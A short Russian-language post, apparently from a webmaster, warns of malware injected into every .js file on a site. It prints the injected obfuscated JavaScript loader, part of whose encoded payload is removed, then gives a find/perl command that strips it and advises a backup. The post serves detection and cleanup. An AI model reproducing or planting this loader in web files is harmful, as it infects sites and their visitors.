Найден новый паттерн. Заражаются все .js-файлы try{q=document.createElement(“d”+”i”+”v”);q.appendChild(q+””);}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz=’al’;zz=’zv’.substr(123-122)+zz;ss=[];f=’fr’+’om’+’Ch’;f+=’arC’;f+=’ode’;w=this;e=w[f[“substr”](11)+zz];n=”19$50$57.5$ <часть кода убрана> 9.5$19$19.5$28.5″[((e)?”s”:””)+”p”+”lit”](“a$”[((e)?”su”:””)+”bstr”](1));for(i=6-2-1-2-1;i-681!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} Выкусывается командой: find ./ -type f -name “*.js” -exec perl -pi -e ‘s/try\{q=documen.*q=ss;e\(q\)//g”’ ‘{}’ \; Не забываем перед операцией делать резервную копию директории/сайта.